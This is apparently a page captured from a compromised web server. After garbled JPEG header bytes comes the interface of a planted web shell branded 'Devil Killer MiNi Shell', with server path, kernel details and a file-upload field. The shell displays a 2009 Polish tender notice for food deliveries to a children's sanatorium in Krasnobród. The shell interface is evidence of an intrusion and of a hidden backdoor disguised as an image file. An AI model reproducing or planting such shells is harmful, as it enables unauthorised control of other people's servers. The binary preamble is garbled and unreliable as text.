JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090225/40090-N-2009.html

<p class="kh_header"><b>Krasnobród: Dostawa artykułów żywnościowych dla 
Samodzielnego Publicznego Sanatorium Rehabilitacyjnego dla Dzieci 
im. Janusza Korczaka w Krasnobrodzie</b><br>
<b>Numer ogłoszenia: 40090 - 2009; data zamieszczenia: 25.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielne Publiczne Sanatorium Rehabilitacyjne dla Dzieci im. Janusza Korczaka , ul. Sanatoryjna 1, 22-440 Krasnobród, woj. lubelskie, tel. 084 6607102, faks 084 6607339.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanatorium-krasnobrod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla 
Samodzielnego Publicznego Sanatorium Rehabilitacyjnego dla Dzieci 
im. Janusza Korczaka w Krasnobrodzie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Samodzielnego Publicznego Sanatorium Rehabilitacyjnego dla Dzieci im. Janusza Korczaka w Krasnobrodzie, 
w obrębie n/w części dostaw
Część 1: Dostawa pieczywa (CPV: 15810000-9),
Część 2: Dostawa artykułów spożywczych (CPV: 15800000-6),
Część 3: Dostawa mięsa i produktów mięsno-wędliniarskich (CPV: 15100000-9),
Część 4: Dostawa drobiu i podrobów drobiowych (świeżych) (15112100-7),
Część 5: Dostawa owoców cytrusowych (CPV: 03222200-5),
Część 6: Dostawa owoców pochodzenia rodzimego (CPV: 15300000-1),
Część 7: Dostawa warzyw (CPV: 15300000-1),
Część 8: Dostawa produktów mleczarskich (15500000-3),
Część 9: Dostawa ryb i przetworów rybnych oraz mrożonek warzywnych, owocowych i drobiowych (CPV: 15220000-6; 15331170-9),
Część 10: Dostawa jaj (CPV: 03142500-3).

2. Szczegółowy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ.
3. Zamawiający dopuszcza składanie ofert równoważnych. Nazwy własne podane w częściach dostaw (np. przyprawa typu Vegeta i inne) są tylko przykładowe. Wykonawca może zaproponować produkt o innej nazwie pod warunkiem, że posiadać on będzie te same walory smakowe i właściwości, co produkty podane przykładowo. W takim przypadku należy zaznaczyć, jakiego produktu dotyczy oferta równoważna (podać nazwę oferowanego produktu). Gramatura oferowanego produktu równoważnego nie może być niższa niż gramatura produktu wskazanego w Załączniku nr 1 do SIWZ. 

4. Artykuły, o którym mowa w pkt. 1 SIWZ oraz w załączniku nr 1 do SIWZ, powinny odpowiadać obowiązującym normom technicznym, smakowym i sanitarnym i spełniać wymogi określone przepisami ustawy z 25.08.2006r o bezpieczeństwie żywności i żywienia oraz aktów wykonawczych do niej.
5. Dowóz artykułów żywnościowych odbywać się będzie na koszt i ryzyko transportem wykonawcy do siedziby (magazynu) zamawiającego.
6. Wykonawca dostarczy artykuły żywnościowe środkami transportu spełniającymi wymogi Rozporządzenia Ministra Zdrowia z 19.12.2002r w sprawie wymagań sanitarnych dotyczących środków transportu żywności.
7. Ilości artykułów żywnościowych podane w częściach zamówienia od 1 do 10 w załączniku nr 1 do SIWZ Szczegółowy opis przedmiotu zamówienia, są szacunkowe i mogą ulec zmianie (zmniejszeniu lub zwiększeniu). Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego.
8. Zamawiający zastrzega, że umowa będzie realizowana w okresie jej trwania, do wysokości kwoty, wymienionej w ofercie przetargowej wykonawcy, za całość dostaw (jest to kwota maksymalna).
9. Zamawiający zastrzega sobie prawo do zamiany wyszczególnionego w załączniku nr 1 do SIWZ asortymentu na inne typowe artykuły oferowane przez wykonawcę. Wartość powyższej zmiany nie może przekroczyć 10% ceny oferty wybranej w postępowaniu jako oferta najkorzystniejsza.
10. Osobami upoważnionymi do kontroli jakościowej dostarczonego towaru są: Starszy Magazynier, Szef Kuchni lub osoba przez niego upoważniona. W przypadku złej jakości dostarczonych produktów żywnościowych, Zamawiający nie dokona ich odbioru. Jeżeli zła jakość dostarczonych produktów żywnościowych zostanie stwierdzona później niż w dniu dostawy, wówczas wykonawca zobowiązany jest do wymiany partii żywności nie odpowiadającej wymaganiom jakości zdrowotnej, na własny koszt w terminie wyznaczonym przez Zamawiającego. Wykonawca zobowiązuje się do załatwienia reklamacji w terminie 3 dni oraz zapewnia możliwość zgłaszania reklamacji telefonicznie oraz faksem.
11. Rozliczenia miedzy Zamawiającym a Wykonawcą będą następowały po każdym zrealizowanym prawidłowo zleceniu, według cen jednostkowych przedstawionych w ofercie za 1kg/szt, na podstawie ilości faktycznie zrealizowanych dostaw..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.80.00.00-6, 15.10.00.00-9, 15.11.21.00-7, 03.22.22.00-5, 15.30.00.00-1, 15.30.00.00-1, 15.50.00.00-3, 15.22.00.00-6, 15.33.11.70-9, 03.14.25.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział wykonawcy, którzy:

1)Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeśli ustawy nakładają obowiązek posiadania takich uprawnień. 
2)Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. 
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
5)Akceptują warunki zawarte w niniejszej specyfikacji.

Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie przedłożonych dokumentów lub oświadczeń, wskazanych w części VI SIWZ. 
Ocena spełniania warunków, dokonywana będzie w następujący sposób: spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy publicznych dnia 29 stycznia 2004r Prawo zamówień publicznych, wykonawca jest zobowiązany przedłożyć:

1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w formie kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
2)Aktualną Decyzję Powiatowego Lekarza Weterynarii o statusie zakładu, w formie kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę.
 - tylko w przypadku, gdy wykonawca składa ofertę w niżej wymienionych częściach dostaw:
Część 3: Dostawa mięsa i produktów mięsno-wędliniarskich,
Część 4: Dostawa drobiu i podrobów drobiowych (świeżych) .

3) Oświadczenie o spełnianiu warunków określonych w art. 22 ustawy Prawo zamówień publicznych, którego wzór stanowi załącznik nr 4 do SIWZ.

Ponadto Wykonawca obowiązany jest przedłożyć ofertę przetargową wraz z kosztorysem ofertowym (na tę część dostaw, na którą składa ofertę), których wzory stanowią załączniki nr 2,3 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sanatorium-krasnobrod.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 22-440 Krasnobród, ul. Sanatoryjna 1 (w siedzibie Zamawiającego).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego w Krasnobrodzie przy ul. Sanatoryjnej 1 
w sekretariacie (budynek pawilonu - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa pieczywa m.in.: Chleb Baltonowski 0,50 kg lub równoważne- szt.25.800. Szczegółowy opis przedmiotu zamówienia (wykaz artykułów) stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów spożywczych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych, m.in.: bułka tarta- 200 kg. Szczegółowy opis przedmiotu zamowienia (wykaz artykułów) stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mięsa i produktów mięsno - wędliniarskich.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mięsa i produktów mięsno - wędliniarskich, m.in.: boczek wędzony - 40 kg. Szczegółowy opis przedmiotu zamowienia (wykaz artykułów) stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa drobiu i podrobów drobiowych świeżych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa drobiu i podrobów drobiowych świeżych, m.in. kurczak świeży - 400 kg. Szczegłówy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.21.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa owoców cytrusowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa owoców cytrusowych, m.in. banany-1200 kg. Szczegłówy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.22.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa owoców pochodzenia rodzimego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa owoców pochodzenia rodzimego, m.in. jabłka konsumpcyjne - 4000 kg. Szczegłówy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa warzyw.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa warzyw, m.in. Kapusta biała	- 1800 kg. Szczegłówy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów mleczarskich, m.in. mleko spożywcze o zawartości tłuszczu 2% folia 1l - termin ważności 5 dni - 17.200 l. Szczegłówy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawa ryb i przetworów rybnych oraz mrożonek warzywnych, owocowych i drobiowych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa ryb i przetworów rybnych oraz mrożonek warzywnych, owocowych i drobiowych, m.in.:filety rybne mrożone z morszczuka - 300 kg. Szczegółowy opis przedmiotu zamówienia (wykaz artykułów), stanowi załącznik nr 1 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.33.11.70-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa jaj w ilości 42.000 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com